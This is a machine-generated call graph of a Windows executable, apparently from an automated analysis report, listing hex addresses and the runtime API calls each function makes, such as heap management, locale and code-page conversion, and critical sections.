12439 40b83b 12438->12439 12440 40d6e0 63 API calls 12438->12440 12439->12426 12441 40b820 12440->12441 12442 40def2 5 API calls 12441->12442 12443 40b82b 12442->12443 12445 40b844 12443->12445 12448 40d606 LeaveCriticalSection 12445->12448 12447 40b84b 12447->12439 12448->12447 12449->12336 12451 40daa0 HeapAlloc 12450->12451 12452 40da6c HeapReAlloc 12450->12452 12453 40da8a 12451->12453 12455 40dac3 VirtualAlloc 12451->12455 12452->12453 12454 40da8e 12452->12454 12453->12221 12454->12451 12455->12453 12456 40dadd HeapFree 12455->12456 12456->12453 12458 40db20 VirtualAlloc 12457->12458 12460 40db67 12458->12460 12460->12225 12461->12228 12462->12161 12481 40d606 LeaveCriticalSection 12463->12481 12465 41066c 12465->12171 12467 4145f0 InterlockedIncrement 12466->12467 12468 4145f3 12466->12468 12467->12468 12469 414600 12468->12469 12470 4145fd InterlockedIncrement 12468->12470 12471 41460a InterlockedIncrement 12469->12471 12472 41460d 12469->12472 12470->12469 12471->12472 12473 414617 InterlockedIncrement 12472->12473 12474 41461a 12472->12474 12473->12474 12475 414633 InterlockedIncrement 12474->12475 12476 414643 InterlockedIncrement 12474->12476 12477 41464e InterlockedIncrement 12474->12477 12475->12474 12476->12474 12477->12174 12482 40d606 LeaveCriticalSection 12478->12482 12480 4106ba 12480->12176 12481->12465 12482->12480 12483->11974 12486 41265c 12484->12486 12488 4126c9 12486->12488 12494 416836 12486->12494 12487 4127c7 12487->12020 12487->12021 12488->12487 12489 416836 73 API calls 12488->12489 12489->12488 12491 414474 12490->12491 12492 41447b 12490->12492 12716 4142d1 12491->12716 12492->12014 12497 4167e3 12494->12497 12500 40ec86 12497->12500 12501 40ec99 12500->12501 12505 40ece6 12500->12505 12508 410735 12501->12508 12504 40ecc6 12504->12505 12528 413fcc 12504->12528 12505->12486 12509 4106bc 63 API calls 12508->12509 12510 41073d 12509->12510 12511 40ec9e 12510->12511 12512 40e79a 63 API calls 12510->12512 12511->12504 12513 414738 12511->12513 12512->12511 12514 414744 12513->12514 12515 410735 63 API calls 12514->12515 12516 414749 12515->12516 12517 414777 12516->12517 12518 41475b 12516->12518 12519 40d6e0 63 API calls 12517->12519 12520 410735 63 API calls 12518->12520 12521 41477e 12519->12521 12522 414760 12520->12522 12544 4146fa 12521->12544 12526 41476e 12522->12526 12527 40e79a 63 API calls 12522->12527 12526->12504 12527->12526 12529 413fd8 12528->12529 12530 410735 63 API calls 12529->12530 12531 413fdd 12530->12531 12532 40d6e0 63 API calls 12531->12532 12539 413fef 12531->12539 12533 41400d 12532->12533 12534 414056 12533->12534 12537 414024 InterlockedDecrement 12533->12537 12538 41403e InterlockedIncrement 12533->12538 12712 414067 12534->12712 12535 40e79a 63 API calls 12540 413ffd 12535->12540 12537->12538 12541 41402f 12537->12541 12538->12534 12539->12535 12539->12540 12540->12505 12541->12538 12542 40b6b5 63 API calls 12541->12542 12543 41403d 12542->12543 12543->12538 12545 414730 12544->12545 12546 4146fe 12544->12546 12552 4147a2 12545->12552 12546->12545 12547 4145d2 8 API calls 12546->12547 12548 414711 12547->12548 12548->12545 12555 414661 12548->12555 12711 40d606 LeaveCriticalSection 12552->12711 12554 4147a9 12554->12522 12556 414672 InterlockedDecrement 12555->12556 12557 4146f5 12555->12557 12558 414687 InterlockedDecrement 12556->12558 12559 41468a 12556->12559 12557->12545 12569 414489 12557->12569 12558->12559 12560 414694 InterlockedDecrement 12559->12560 12561 414697 12559->12561 12560->12561 12562 4146a1 InterlockedDecrement 12561->12562 12563 4146a4 12561->12563 12562->12563 12564 4146ae InterlockedDecrement 12563->12564 12566 4146b1 12563->12566 12564->12566 12565 4146ca InterlockedDecrement 12565->12566 12566->12565 12567 4146e5 InterlockedDecrement 12566->12567 12568 4146da InterlockedDecrement 12566->12568 12567->12557 12568->12566 12570 41450d 12569->12570 12572 4144a0 12569->12572 12571 41455a 12570->12571 12573 40b6b5 63 API calls 12570->12573 12583 414581 12571->12583 12623 417667 12571->12623 12572->12570 12579 40b6b5 63 API calls 12572->12579 12581 4144d4 12572->12581 12575 41452e 12573->12575 12577 40b6b5 63 API calls 12575->12577 12582 414541 12577->12582 12578 40b6b5 63 API calls 12578->12583 12586 4144c9 12579->12586 12580 4145c6 12587 40b6b5 63 API calls 12580->12587 12588 40b6b5 63 API calls 12581->12588 12598 4144f5 12581->12598 12589 40b6b5 63 API calls 12582->12589 12583->12580 12590 40b6b5 63 API calls 12583->12590 12584 40b6b5 63 API calls 12585 414502 12584->12585 12591 40b6b5 63 API calls 12585->12591 12599 417841 12586->12599 12593 4145cc 12587->12593 12594 4144ea 12588->12594 12595 41454f 12589->12595 12590->12583 12591->12570 12593->12545 12615 4177fc 12594->12615 12597 40b6b5 63 API calls 12595->12597 12597->12571 12598->12584 12600 4178cb 12599->12600 12601 41784e 12599->12601 12600->12581 12602 41785f 12601->12602 12603 40b6b5 63 API calls 12601->12603 12604 417871 12602->12604 12605 40b6b5 63 API calls 12602->12605 12603->12602 12606 417883 12604->12606 12607 40b6b5 63 API calls 12604->12607 12605->12604 12608 417895 12606->12608 12610 40b6b5 63 API calls 12606->12610 12607->12606 12609 4178a7 12608->12609 12611 40b6b5 63 API calls 12608->12611 12612 4178b9 12609->12612 12613 40b6b5 63 API calls 12609->12613 12610->12608 12611->12609 12612->12600 12614 40b6b5 63 API calls 12612->12614 12613->12612 12614->12600 12616 417809 12615->12616 12617 41783d 12615->12617 12618 417819 12616->12618 12619 40b6b5 63 API calls 12616->12619 12617->12598 12620 41782b 12618->12620 12621 40b6b5 63 API calls 12618->12621 12619->12618 12620->12617 12622 40b6b5 63 API calls 12620->12622 12621->12620 12622->12617 12624 417678 12623->12624 12710 41457a 12623->12710 12625 40b6b5 63 API calls 12624->12625 12626 417680 12625->12626 12627 40b6b5 63 API calls 12626->12627 12628 417688 12627->12628 12629 40b6b5 63 API calls 12628->12629 12630 417690 12629->12630 12631 40b6b5 63 API calls 12630->12631 12632 417698 12631->12632 12633 40b6b5 63 API calls 12632->12633 12634 4176a0 12633->12634 12635 40b6b5 63 API calls 12634->12635 12636 4176a8 12635->12636 12637 40b6b5 63 API calls 12636->12637 12638 4176af 12637->12638 12639 40b6b5 63 API calls 12638->12639 12640 4176b7 12639->12640 12641 40b6b5 63 API calls 12640->12641 12642 4176bf 12641->12642 12643 40b6b5 63 API calls 12642->12643 12644 4176c7 12643->12644 12645 40b6b5 63 API calls 12644->12645 12646 4176cf 12645->12646 12647 40b6b5 63 API calls 12646->12647 12648 4176d7 12647->12648 12649 40b6b5 63 API calls 12648->12649 12650 4176df 12649->12650 12651 40b6b5 63 API calls 12650->12651 12652 4176e7 12651->12652 12653 40b6b5 63 API calls 12652->12653 12654 4176ef 12653->12654 12655 40b6b5 63 API calls 12654->12655 12656 4176f7 12655->12656 12657 40b6b5 63 API calls 12656->12657 12658 417702 12657->12658 12659 40b6b5 63 API calls 12658->12659 12660 41770a 12659->12660 12661 40b6b5 63 API calls 12660->12661 12662 417712 12661->12662 12663 40b6b5 63 API calls 12662->12663 12664 41771a 12663->12664 12665 40b6b5 63 API calls 12664->12665 12666 417722 12665->12666 12667 40b6b5 63 API calls 12666->12667 12668 41772a 12667->12668 12669 40b6b5 63 API calls 12668->12669 12670 417732 12669->12670 12671 40b6b5 63 API calls 12670->12671 12672 41773a 12671->12672 12673 40b6b5 63 API calls 12672->12673 12674 417742 12673->12674 12675 40b6b5 63 API calls 12674->12675 12676 41774a 12675->12676 12677 40b6b5 63 API calls 12676->12677 12678 417752 12677->12678 12679 40b6b5 63 API calls 12678->12679 12680 41775a 12679->12680 12681 40b6b5 63 API calls 12680->12681 12682 417762 12681->12682 12683 40b6b5 63 API calls 12682->12683 12684 41776a 12683->12684 12685 40b6b5 63 API calls 12684->12685 12686 417772 12685->12686 12687 40b6b5 63 API calls 12686->12687 12688 41777a 12687->12688 12689 40b6b5 63 API calls 12688->12689 12690 417788 12689->12690 12691 40b6b5 63 API calls 12690->12691 12692 417793 12691->12692 12693 40b6b5 63 API calls 12692->12693 12694 41779e 12693->12694 12695 40b6b5 63 API calls 12694->12695 12696 4177a9 12695->12696 12697 40b6b5 63 API calls 12696->12697 12698 4177b4 12697->12698 12699 40b6b5 63 API calls 12698->12699 12700 4177bf 12699->12700 12701 40b6b5 63 API calls 12700->12701 12702 4177ca 12701->12702 12703 40b6b5 63 API calls 12702->12703 12704 4177d5 12703->12704 12705 40b6b5 63 API calls 12704->12705 12706 4177e0 12705->12706 12707 40b6b5 63 API calls 12706->12707 12708 4177eb 12707->12708 12709 40b6b5 63 API calls 12708->12709 12709->12710 12710->12578 12711->12554 12715 40d606 LeaveCriticalSection 12712->12715 12714 41406e 12714->12539 12715->12714 12717 4142dd 12716->12717 12718 410735 63 API calls 12717->12718 12719 4142e6 12718->12719 12720 413fcc 65 API calls 12719->12720 12721 4142f0 12720->12721 12747 414070 12721->12747 12724 411c75 63 API calls 12725 414311 12724->12725 12726 414430 12725->12726 12754 4140ec 12725->12754 12726->12492 12729 414341 InterlockedDecrement 12731 414351 12729->12731 12732 414362 InterlockedIncrement 12729->12732 12730 41443d 12730->12726 12734 414450 12730->12734 12736 40b6b5 63 API calls 12730->12736 12731->12732 12735 40b6b5 63 API calls 12731->12735 12732->12726 12733 414378 12732->12733 12733->12726 12739 40d6e0 63 API calls 12733->12739 12737 40bfc1 63 API calls 12734->12737 12738 414361 12735->12738 12736->12734 12737->12726 12738->12732 12740 41438c InterlockedDecrement 12739->12740 12742 414408 12740->12742 12743 41441b InterlockedIncrement 12740->12743 12742->12743 12745 40b6b5 63 API calls 12742->12745 12764 414432 12743->12764 12746 41441a 12745->12746 12746->12743 12748 40ec86 73 API calls 12747->12748 12749 414084 12748->12749 12750 4140ad 12749->12750 12751 41408f GetOEMCP 12749->12751 12752 4140b2 GetACP 12750->12752 12753 41409f 12750->12753 12751->12753 12752->12753 12753->12724 12753->12726 12755 414070 75 API calls 12754->12755 12756 41410c 12755->12756 12757 414117 12756->12757 12760 41415b IsValidCodePage 12756->12760 12763 414180 12756->12763 12758 40ce09 5 API calls 12757->12758 12759 4142cf 12758->12759 12759->12729 12759->12730 12760->12757 12761 41416d GetCPInfo 12760->12761 12761->12757 12761->12763 12767 413e39 GetCPInfo 12763->12767 12900 40d606 LeaveCriticalSection 12764->12900 12766 414439 12766->12726 12770 413e6d 12767->12770 12776 413f1f 12767->12776 12777 417625 12770->12777 12772 40ce09 5 API calls 12774 413fca 12772->12774 12774->12763 12775 417426 98 API calls 12775->12776 12776->12772 12778 40ec86 73 API calls 12777->12778 12779 417638 12778->12779 12787 41746b 12779->12787 12782 417426 12783 40ec86 73 API calls 12782->12783 12784 417439 12783->12784 12853 417081 12784->12853 12788 4174b7 12787->12788 12789 41748c GetStringTypeW 12787->12789 12790 4174a4 12788->12790 12792 41759e 12788->12792 12789->12790 12791 4174ac GetLastError 12789->12791 12793 4174f0 MultiByteToWideChar 12790->12793 12810 417598 12790->12810 12791->12788 12815 417a20 GetLocaleInfoA 12792->12815 12799 41751d 12793->12799 12793->12810 12795 40ce09 5 API calls 12797 413eda 12795->12797 12797->12782 12798 417532 12804 41756b MultiByteToWideChar 12798->12804 12798->12810 12799->12798 12802 40b84d 63 API calls 12799->12802 12800 4175ef GetStringTypeA 12801 41760a 12800->12801 12800->12810 12805 40b6b5 63 API calls 12801->12805 12802->12798 12807 417581 GetStringTypeW 12804->12807 12808 417592 12804->12808 12805->12810 12807->12808 12811 4147ae 12808->12811 12810->12795 12812 4147ba 12811->12812 12813 4147cb 12811->12813 12812->12813 12814 40b6b5 63 API calls 12812->12814 12813->12810 12814->12813 12816 417a53 12815->12816 12817 417a4e 12815->12817 12846 416f54 12816->12846 12819 40ce09 5 API calls 12817->12819 12820 4175c2 12819->12820 12820->12800 12820->12810 12821 417a69 12820->12821 12822 417aa9 GetCPInfo 12821->12822 12823 417b33 12821->12823 12824 417ac0 12822->12824 12825 417b1e MultiByteToWideChar 12822->12825 12826 40ce09 5 API calls 12823->12826 12824->12825 12827 417ac6 GetCPInfo 12824->12827 12825->12823 12830 417ad9 12825->12830 12829 4175e3 12826->12829 12827->12825 12828 417ad3 12827->12828 12828->12825 12828->12830 12829->12800 12829->12810 12831 40b84d 63 API calls 12830->12831 12833 417b0b 12830->12833 12831->12833 12832 417b68 MultiByteToWideChar 12834 417b80 12832->12834 12835 417b9f 12832->12835 12833->12823 12833->12832 12837 417ba4 12834->12837 12838 417b87 WideCharToMultiByte 12834->12838 12836 4147ae 63 API calls 12835->12836 12836->12823 12839 417bc3 12837->12839 12840 417baf WideCharToMultiByte 12837->12840 12838->12835 12841 411cba 63 API calls 12839->12841 12840->12835 12840->12839 12842 417bcb 12841->12842 12842->12835 12843 417bd4 WideCharToMultiByte 12842->12843 12843->12835 12844 417be6 12843->12844 12845 40b6b5 63 API calls 12844->12845 12845->12835 12849 41a354 12846->12849 12850 41a36d 12849->12850 12851 41a125 87 API calls 12850->12851 12852 416f65 12851->12852 12852->12817 12854 4170a2 LCMapStringW 12853->12854 12856 4170bd 12853->12856 12855 4170c5 GetLastError 12854->12855 12854->12856 12855->12856 12857 4172bb 12856->12857 12860 417117 12856->12860 12861 417a20 87 API calls 12857->12861 12858 4172b2 12863 40ce09 5 API calls 12858->12863 12859 417130 MultiByteToWideChar 12859->12858 12870 41715d 12859->12870 12860->12858 12860->12859 12862 4172e3 12861->12862 12862->12858 12865 4173d7 LCMapStringA 12862->12865 12866 4172fc 12862->12866 12864 413efa 12863->12864 12864->12775 12867 417333 12865->12867 12868 417a69 70 API calls 12866->12868 12871 4173fe 12867->12871 12876 40b6b5 63 API calls 12867->12876 12873 41730e 12868->12873 12869 4171ae MultiByteToWideChar 12874 4171c7 LCMapStringW 12869->12874 12875 4172a9 12869->12875 12872 40b84d 63 API calls 12870->12872 12880 417176 12870->12880 12871->12858 12882 40b6b5 63 API calls 12871->12882 12872->12880 12873->12858 12877 417318 LCMapStringA 12873->12877 12874->12875 12879 4171e8 12874->12879 12878 4147ae 63 API calls 12875->12878 12876->12871 12877->12867 12885 41733a 12877->12885 12878->12858 12881 4171f1 12879->12881 12884 41721a 12879->12884 12880->12858 12880->12869 12881->12875 12883 417203 LCMapStringW 12881->12883 12882->12858 12883->12875 12890 417235 12884->12890 12892 40b84d 63 API calls 12884->12892 12887 40b84d 63 API calls 12885->12887 12891 41734b 12885->12891 12886 417269 LCMapStringW 12888 417281 WideCharToMultiByte 12886->12888 12889 4172a3 12886->12889 12887->12891 12888->12889 12893 4147ae 63 API calls 12889->12893 12890->12875 12890->12886 12891->12867 12894 417389 LCMapStringA 12891->12894 12892->12890 12893->12875 12896 4173a5 12894->12896 12897 4173a9 12894->12897 12899 4147ae 63 API calls 12896->12899 12898 417a69 70 API calls 12897->12898 12898->12896 12899->12867 12900->12766 12902 41358c 12901->12902 12903 41046e 6 API calls 12902->12903 12904 4135a4 12902->12904 12903->12902 12904->12044 12908 40d281 12905->12908 12907 40d2ca 12907->12046 12909 40d28d 12908->12909 12916 40e806 12909->12916 12915 40d2ae 12915->12907 12917 40d6e0 63 API calls 12916->12917 12918 40d292 12917->12918 12919 40d196 12918->12919 12920 4104e9 6 API calls 12919->12920 12921 40d1aa 12920->12921 12922 4104e9 6 API calls 12921->12922 12923 40d1ba 12922->12923 12924 40d23d 12923->12924 12939 40e56a 12923->12939 12936 40d2b7 12924->12936 12926 40d224 12927 41046e 6 API calls 12926->12927 12930 40d232 12927->12930 12928 40d1fc 12928->12924 12933 411d06 72 API calls 12928->12933 12934 40d212 12928->12934 12929 40d1d8 12929->12926 12929->12928 12952 411d06 12929->12952 12931 41046e 6 API calls 12930->12931 12931->12924 12933->12934 12934->12924 12935 41046e 6 API calls 12934->12935 12935->12926 13001 40e80f 12936->13001 12940 40e576 12939->12940 12941 40e5a3 12940->12941 12942 40e586 12940->12942 12943 40e5e4 HeapSize 12941->12943 12945 40d6e0 63 API calls 12941->12945 12944 40bfc1 63 API calls 12942->12944 12949 40e59b 12943->12949 12946 40e58b 12944->12946 12948 40e5b3 12945->12948 12947 40e744 6 API calls 12946->12947 12947->12949 12957 40e604 12948->12957 12949->12929 12954 411d0f 12952->12954 12955 411d4e 12954->12955 12956 411d2f Sleep 12954->12956 12961 40e34f 12954->12961 12955->12928 12956->12954 12960 40d606 LeaveCriticalSection 12957->12960 12959 40e5df 12959->12943 12959->12949 12960->12959 12962 40e35b 12961->12962 12963 40e370 12962->12963 12964 40e362 12962->12964 12966 40e383 12963->12966 12967 40e377 12963->12967 12965 40b84d 63 API calls 12964->12965 12970 40e36a 12965->12970 12975 40e4f5 12966->12975 12983 40e390 12966->12983 12968 40b6b5 63 API calls 12967->12968 12968->12970 12969 40e528 12971 40d2e3 6 API calls 12969->12971 12970->12954 12974 40e52e 12971->12974 12972 40d6e0 63 API calls 12972->12983 12973 40e4fa HeapReAlloc 12973->12970 12973->12975 12976 40bfc1 63 API calls 12974->12976 12975->12969 12975->12973 12977 40e54c 12975->12977 12978 40d2e3 6 API calls 12975->12978 12981 40e542 12975->12981 12976->12970 12977->12970 12979 40bfc1 63 API calls 12977->12979 12978->12975 12982 40e555 GetLastError 12979->12982 12984 40bfc1 63 API calls 12981->12984 12982->12970 12983->12969 12983->12970 12983->12972 12985 40e41b HeapAlloc 12983->12985 12986 40e470 HeapReAlloc 12983->12986 12988 40def2 5 API calls 12983->12988 12989 40e4db 12983->12989 12990 40d2e3 6 API calls 12983->12990 12992 40d743 VirtualFree VirtualFree HeapFree 12983->12992 12994 40e4be 12983->12994 12997 40e493 12983->12997 12996 40e4c3 12984->12996 12985->12983 12986->12983 12987 40e4c8 GetLastError 12987->12970 12988->12983 12989->12970 12991 40bfc1 63 API calls 12989->12991 12990->12983 12993 40e4e8 12991->12993 12992->12983 12993->12970 12993->12982 12995 40bfc1 63 API calls 12994->12995 12995->12996 12996->12970 12996->12987 13000 40d606 LeaveCriticalSection 12997->13000 12999 40e49a 12999->12983 13000->12999 13004 40d606 LeaveCriticalSection 13001->13004 13003 40d2bc 13003->12915 13004->13003 13008 40b9aa 13005->13008 13006 40b9b8 13007 40bfc1 63 API calls 13006->13007 13009 40b9bd 13007->13009 13008->13006 13011 40b9ec 13008->13011 13010 40e744 6 API calls 13009->13010 13016 40b9cd 13010->13016 13012 40d6e0 63 API calls 13011->13012 13013 40b9f3 13012->13013 13058 40b917 13013->13058 13015 40b9ff 13062 40ba18 13015->13062 13016->12050 13019 4017cc 13018->13019 13019->12054 13022 40af70 13020->13022 13021 40b84d 63 API calls 13021->13022 13022->13021 13023 40af8a 13022->13023 13024 40d2e3 6 API calls 13022->13024 13028 40af8c 13022->13028 13023->12060 13024->13022 13025 40afb2 13150 40af49 13025->13150 13028->13025 13030 40d2bd 73 API calls 13028->13030 13030->13025 13031 40afca 13033 401903 lstrlenA 13032->13033 13034 4018fc 13032->13034 13162 4017e0 13033->13162 13034->12078 13037 401940 GetLastError 13039 40194b MultiByteToWideChar 13037->13039 13040 40198d 13037->13040 13038 401996 13038->12078 13041 4017e0 77 API calls 13039->13041 13040->13038 13178 401030 GetLastError 13040->13178 13043 401970 MultiByteToWideChar 13041->13043 13043->13040 13045 40af66 74 API calls 13044->13045 13046 40187c 13045->13046 13047 401885 SysAllocString 13046->13047 13048 4018a4 13046->13048 13047->13048 13048->12080 13050 40231a #24 13049->13050 13050->12087 13052 4019aa InterlockedDecrement 13051->13052 13057 4019df #9 13051->13057 13053 4019b8 13052->13053 13052->13057 13054 4019c2 #6 13053->13054 13055 4019c9 13053->13055 13053->13057 13054->13055 13187 40aec0 13055->13187 13057->12095 13059 40b930 13058->13059 13061 40b92c 13058->13061 13059->13061 13065 40eeab 13059->13065 13061->13015 13149 40d606 LeaveCriticalSection 13062->13149 13064 40ba1f 13064->13016 13072 40ef2b 13065->13072 13073 40eec6 13065->13073 13066 40eecc WideCharToMultiByte 13066->13072 13066->13073 13067 411cba 63 API calls 13067->13073 13068 40eeef WideCharToMultiByte 13069 40ef37 13068->13069 13068->13073 13071 40b6b5 63 API calls 13069->13071 13071->13072 13072->13061 13073->13066 13073->13067 13073->13068 13073->13072 13074 40b6b5 63 API calls 13073->13074 13075 414d44 13073->13075 13074->13073 13076 414d59 13075->13076 13082 414d76 13075->13082 13077 40bfc1 63 API calls 13076->13077 13079 414d5e 13077->13079 13078 414dd4 13080 40bfc1 63 API calls 13078->13080 13081 40e744 6 API calls 13079->13081 13105 414d6e 13080->13105 13081->13105 13082->13078 13083 414db5 13082->13083 13117 414cea 13082->13117 13085 414de7 13083->13085 13086 414dcb 13083->13086 13088 414e12 13083->13088 13089 411c75 63 API calls 13085->13089 13085->13105 13087 40eeab 75 API calls 13086->13087 13091 414dd0 13087->13091 13092 414e8f 13088->13092 13094 414e41 13088->13094 13088->13105 13090 414df7 13089->13090 13090->13088 13097 411c75 63 API calls 13090->13097 13090->13105 13091->13078 13091->13088 13093 414f7a 13092->13093 13098 414e98 13092->13098 13095 40b6b5 63 API calls 13093->13095 13096 40b6b5 63 API calls 13094->13096 13095->13105 13100 414e4b 13096->13100 13097->13088 13099 411d54 73 API calls 13098->13099 13098->13105 13101 414e51 13099->13101 13100->13101 13125 411d54 13100->13125 13104 411cba 63 API calls 13101->13104 13101->13105 13116 414f5e 13101->13116 13103 40b6b5 63 API calls 13103->13105 13106 414efb 13104->13106 13105->13073 13107 40ef42 63 API calls 13106->13107 13106->13116 13108 414f14 13107->13108 13109 414f28 SetEnvironmentVariableA 13108->13109 13110 40e61c 10 API calls 13108->13110 13111 414f49 13109->13111 13112 414f52 13109->13112 13115 414f25 13110->13115 13113 40bfc1 63 API calls 13111->13113 13114 40b6b5 63 API calls 13112->13114 13113->13112 13114->13116 13115->13109 13116->13103 13116->13105 13118 414d3b 13117->13118 13119 414cfb 13117->13119 13118->13083 13120 411cba 63 API calls 13119->13120 13121 414d12 13120->13121 13122 40e79a 63 API calls 13121->13122 13123 414d24 13121->13123 13122->13123 13123->13118 13130 417d6d 13123->13130 13127 411d5d 13125->13127 13128 411da0 13127->13128 13129 411d81 Sleep 13127->13129 13138 40b783 13127->13138 13128->13101 13129->13127 13131 417d7e 13130->13131 13137 417d7a 13130->13137 13132 40b84d 63 API calls 13131->13132 13133 417d91 13132->13133 13134 40ef42 63 API calls 13133->13134 13133->13137 13135 417da3 13134->13135 13136 40e61c 10 API calls 13135->13136 13135->13137 13136->13137 13137->13123 13139 40b792 13138->13139 13140 40b7ba 13138->13140 13139->13140 13141 40b79e 13139->13141 13143 40e56a 64 API calls 13140->13143 13146 40b7cf 13140->13146 13142 40bfc1 63 API calls 13141->13142 13145 40b7a3 13142->13145 13143->13146 13144 40e34f 71 API calls 13148 40b7b3 13144->13148 13147 40e744 6 API calls 13145->13147 13146->13144 13147->13148 13148->13127 13149->13064 13156 40d0f5 13150->13156 13153 40cd39 13154 40cd62 13153->13154 13155 40cd6e RaiseException 13153->13155 13154->13155 13155->13031 13157 40af59 13156->13157 13158 40d115 13156->13158 13157->13153 13158->13157 13159 40b84d 63 API calls 13158->13159 13160 40d128 13159->13160 13160->13157 13161 40ef42 63 API calls 13160->13161 13161->13157 13163 4017f3 13162->13163 13164 4017e9 EntryPoint 13162->13164 13165 401805 13163->13165 13166 4017fb EntryPoint 13163->13166 13164->13163 13167 401818 13165->13167 13168 40180e EntryPoint 13165->13168 13166->13165 13169 40183e 13167->13169 13171 40b783 72 API calls 13167->13171 13175 401844 13167->13175 13168->13167 13172 40b6b5 63 API calls 13169->13172 13176 40182d 13171->13176 13172->13175 13173 40186d MultiByteToWideChar 13173->13037 13173->13038 13174 40184e EntryPoint 13174->13175 13175->13173 13175->13174 13180 40b743 13175->13180 13176->13175 13177 401834 EntryPoint 13176->13177 13177->13169 13179 401044 EntryPoint 13178->13179 13181 40e231 63 API calls 13180->13181 13183 40b75d 13181->13183 13182 40b779 13182->13175 13183->13182 13184 40bfc1 63 API calls 13183->13184 13185 40b770 13184->13185 13185->13182 13186 40bfc1 63 API calls 13185->13186 13186->13182 13188 40b6b5 13187->13188 13189 40b714 HeapFree 13188->13189 13191 40b73d 13188->13191 13190 40b727 13189->13190 13189->13191 13192 40bfc1 63 API calls 13190->13192 13191->13057 13192->13191 13194 40e8ea 13193->13194 13195 40d6e0 63 API calls 13194->13195 13196 40e8f1 13195->13196 13197 40e9ba 13196->13197 13198 40e91d 13196->13198 13212 40e9f5 13197->13212 13200 4104e9 6 API calls 13198->13200 13202 40e928 13200->13202 13204 40e9aa 13202->13204 13206 4104e9 6 API calls 13202->13206 13203 40e9f2 13203->12099 13204->13197 13211 40e93d 13206->13211 13207 40e9e9 13208 40e7ee 4 API calls 13207->13208 13208->13203 13209 4104e0 6 API calls 13209->13211 13210 4104e9 6 API calls 13210->13211 13211->13204 13211->13209 13211->13210 13213 40e9d6 13212->13213 13214 40e9fb 13212->13214 13213->13203 13216 40d606 LeaveCriticalSection 13213->13216 13217 40d606 LeaveCriticalSection 13214->13217 13216->13207 13217->13213 13235 405c70 13238 405a20 13235->13238 13237 405c82 13239 405a5a 13238->13239 13248 405a34 13238->13248 13239->13237 13240 405bb3 13241 405bf4 13240->13241 13243 40bf62 77 API calls 13240->13243 13241->13237 13242 40bfc1 63 API calls 13242->13248 13243->13241 13246 4055e0 77 API calls 13246->13248 13248->13239 13248->13240 13248->13242 13248->13246 13249 40bf62 13248->13249 13252 40bc8e 13248->13252 13258 405000 13248->13258 13286 40becc 13249->13286 13251 40bf7a 13251->13248 13253 40bc9d 13252->13253 13257 40bcb2 13252->13257 13254 40bfc1 63 API calls 13253->13254 13255 40bca2 13254->13255 13256 40e744 6 API calls 13255->13256 13256->13257 13257->13248 13259 40500c 13258->13259 13260 405051 13258->13260 13261 40bfc1 63 API calls 13259->13261 13270 40506f 13260->13270 13512 404f90 13260->13512 13262 40501e 13261->13262 13264 40bf62 77 API calls 13262->13264 13267 40503f 13264->13267 13265 405099 13266 404f90 77 API calls 13265->13266 13271 4050a0 13266->13271 13267->13260 13269 40bc8e 63 API calls 13267->13269 13268 405143 13268->13248 13269->13260 13270->13248 13271->13268 13272 404f90 77 API calls 13271->13272 13273 4050ca 13271->13273 13272->13271 13274 4050f1 13273->13274 13276 404f90 77 API calls 13273->13276 13275 405104 13274->13275 13277 404f90 77 API calls 13274->13277 13278 40511e 13275->13278 13282 404f90 77 API calls 13275->13282 13279 4050d4 13276->13279 13277->13274 13281 405132 13278->13281 13284 404f90 77 API calls 13278->13284 13280 404f90 77 API calls 13279->13280 13283 4050db 13280->13283 13281->13248 13282->13275 13283->13274 13285 404f90 77 API calls 13283->13285 13284->13278 13285->13283 13287 40bed8 13286->13287 13288 40bf21 13287->13288 13290 40beec 13287->13290 13298 40bf16 13287->13298 13299 40fb29 13288->13299 13292 40bfc1 63 API calls 13290->13292 13294 40bf06 13292->13294 13296 40e744 6 API calls 13294->13296 13296->13298 13298->13251 13300 40fb3b 13299->13300 13301 40fb5d EnterCriticalSection 13299->13301 13300->13301 13302 40fb43 13300->13302 13304 40bf29 13301->13304 13303 40d6e0 63 API calls 13302->13303 13303->13304 13305 40bcc2 13304->13305 13306 40bcfe 13305->13306 13308 40bce0 13305->13308 13321 40bf58 13306->13321 13307 40bce9 13309 40bfc1 63 API calls 13307->13309 13308->13306 13308->13307 13311 40bd3d 13308->13311 13320 40bcee 13309->13320 13310 40e744 6 API calls 13310->13306 13311->13306 13313 40be5b 13311->13313 13316 40be87 13311->13316 13324 4103f1 13311->13324 13333 40fa20 13311->13333 13339 4102f4 13311->13339 13369 40fc07 13311->13369 13317 40bfc1 63 API calls 13313->13317 13318 40bfc1 63 API calls 13316->13318 13317->13320 13318->13320 13320->13310 13505 40fb9c 13321->13505 13323 40bf60 13323->13298 13327 410405 13324->13327 13329 410401 13324->13329 13325 41040a 13326 40bfc1 63 API calls 13325->13326 13328 41040f 13326->13328 13327->13325 13327->13329 13330 410454 13327->13330 13331 40e744 6 API calls 13328->13331 13329->13311 13330->13329 13332 40bfc1 63 API calls 13330->13332 13331->13329 13332->13328 13334 40fa44 13333->13334 13335 40fa2f 13333->13335 13334->13311 13336 40bfc1 63 API calls 13335->13336 13337 40fa34 13336->13337 13338 40e744 6 API calls 13337->13338 13338->13334 13340 410300 13339->13340 13341 410323 13340->13341 13342 410308 13340->13342 13344 410331 13341->13344 13347 410372 13341->13347 13389 40bfd4 13342->13389 13346 40bfd4 63 API calls 13344->13346 13349 410336 13346->13349 13350 410393 13347->13350 13351 41037f 13347->13351 13348 40bfc1 63 API calls 13360 410315 13348->13360 13352 40bfc1 63 API calls 13349->13352 13392 415599 13350->13392 13353 40bfd4 63 API calls 13351->13353 13355 41033d 13352->13355 13356 410384 13353->13356 13358 40e744 6 API calls 13355->13358 13359 40bfc1 63 API calls 13356->13359 13357 410399 13361 4103a6 13357->13361 13362 4103bc 13357->13362 13358->13360 13359->13355 13360->13311 13402 40fd32 13361->13402 13363 40bfc1 63 API calls 13362->13363 13365 4103c1 13363->13365 13367 40bfd4 63 API calls 13365->13367 13366 4103b4 13466 4103e7 13366->13466 13367->13366 13370 40fc17 13369->13370 13374 40fc34 13369->13374 13371 40bfc1 63 API calls 13370->13371 13372 40fc1c 13371->13372 13373 40e744 6 API calls 13372->13373 13380 40fc2c 13373->13380 13375 40fc69 13374->13375 13374->13380 13502 41512d 13374->13502 13377 40fa20 63 API calls 13375->13377 13378 40fc7d 13377->13378 13379 4102f4 75 API calls 13378->13379 13381 40fc84 13379->13381 13380->13311 13381->13380 13382 40fa20 63 API calls 13381->13382 13383 40fca7 13382->13383 13383->13380 13384 40fa20 63 API calls 13383->13384 13385 40fcb3 13384->13385 13385->13380 13386 40fa20 63 API calls 13385->13386 13387 40fcbf 